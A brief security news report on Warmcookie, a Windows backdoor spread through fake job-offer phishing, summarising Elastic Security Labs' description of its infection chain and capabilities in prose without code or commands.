Security News > 2024 > June > New Warmcookie Windows backdoor pushed via fake job offers
A never-before-seen Windows malware named 'Warmcookie' is distributed through fake job offer phishing campaigns to breach corporate networks.
According to Elastic Security Labs, which discovered the new threat, Warmcookie is capable of extensive machine fingerprinting, screenshot capturing, and the deployment of additional payloads.
The phishing campaign utilizes fake job and recruitment offers sent via emails with attention-grabbing subjects.
When executed, the JS script executes a PowerShell script that uses the Background Intelligent Transfer Service to download the Warmcookie DLL file from a specified URL and execute it via rundll32.
Warmcookie is a backdoor malware with various capabilities designed to infiltrate, persist, and gather intelligence from victim systems.
Elastic's analysts comment that despite Warmcookie being a new backdoor with plenty of room for improvement, it is already entirely capable of inflicting significant damage to its targets, especially given its capability to introduce additional payloads.